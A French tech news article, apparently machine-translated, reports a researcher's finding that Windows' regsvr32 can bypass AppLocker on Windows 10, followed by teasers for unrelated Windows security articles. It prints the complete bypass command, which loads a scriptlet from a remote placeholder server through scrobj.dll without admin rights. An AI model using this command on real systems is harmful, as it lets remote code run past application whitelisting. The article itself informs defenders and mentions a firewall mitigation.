Regsvr32 peut être utilisé pour contourner l'applocker sur Windows 10
Vidéo: Allow Windows to Run Specified Programs Only 2024
Casey Smith, un chercheur du Colorado, a découvert que Regsvr32 peut être utilisé pour contourner AppLocker sous Windows 10, ce qui constitue un gros problème pour les utilisateurs d'ordinateurs, en particulier ceux qui travaillent dans le monde des affaires.
AppLocker a été introduit pour la première fois dans Windows 7 et Windows Server 2008 R2. Il est conçu pour permettre aux administrateurs de spécifier le groupe ou les utilisateurs pouvant tirer parti de tout ou partie des applications en fonction de l'identité unique des fichiers. Si vous êtes une personne qui a tendance à utiliser AppLocker, vous devez être conscient du fait qu'il peut être utilisé pour créer certaines règles afin de permettre aux applications de les exécuter ou de les arrêter dans leurs traces.
Pour ceux qui ne le sauraient peut-être pas, Regvr32 peut être utilisé pour enregistrer et désenregistrer les DLL. Il ne s’agit pas d’un outil en un clic, car il s’agit d’un utilitaire de ligne de commande. Par conséquent, seuls les utilisateurs expérimentés devraient chercher à tirer parti de ce qu’il a à offrir.
Nous comprenons qu'en utilisant cette technique, cela ne modifie pas le registre du système informatique, ce qui empêche les administrateurs de savoir si des modifications ont été apportées.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
«Ce qui est étonnant ici, c’est que regsvr32 est déjà conscient du proxy, utilise TLS, suit les redirections, etc.… et… vous avez deviné qu’un binaire MS par défaut, signé, était signé. Donc, tout ce que vous avez à faire est d’héberger votre fichier.sct à un emplacement que vous contrôlez », a écrit Smith.
La technique ci-dessus ne nécessite pas de privilèges administratifs et ne modifie pas le registre. De plus, les scripts peuvent être appelés via HTTP ou HTTPS. Pour le moment, Microsoft n'a pas publié de correctif pour ce petit problème. La seule option consiste à bloquer Regsvr32 via le pare-feu Windows.
Chose intéressante, le géant du logiciel n'a pas encore répondu au problème de sécurité auquel son système d'exploitation est confronté. Maintenant que c'est ouvert, nous nous attendons à quelque chose de la part de la société avec des discussions sur un futur patch.
Les pirates ont utilisé edge pour contourner le poste de travail vmware au cours de pwn2own 2017
Le concours Pwn2Own de cette année s'est terminé après trois jours de piratage des navigateurs et des systèmes d'exploitation. À la fin, le navigateur Edge de Microsoft est devenu le perdant après avoir échoué à parer aux attaques lors de l'événement. Une équipe de la société de sécurité chinoise Qihoo 360 a exploité Edge et a associé deux failles de sécurité pour échapper à un…
Microsoft peut-il créer un antivirus puissant pour Windows 10, peut-être un meilleur défenseur pour Windows?
La phase de test de Windows 10 Technical Preview touche à sa fin et les utilisateurs se posent encore quelques questions avant la version finale de Windows 10. L’un des principaux sujets de discussion à propos de Windows 10 est la sécurité du système et si nous devrions utiliser un antivirus ou non. …
Pendant combien de temps Windows 10 peut-il être utilisé sans activation?
Pendant combien de temps Windows 10 peut-il être utilisé sans activation? La réponse est en réalité un mois jusqu'à l'entrée en vigueur des restrictions. Apprenez-en plus à ce sujet ici.
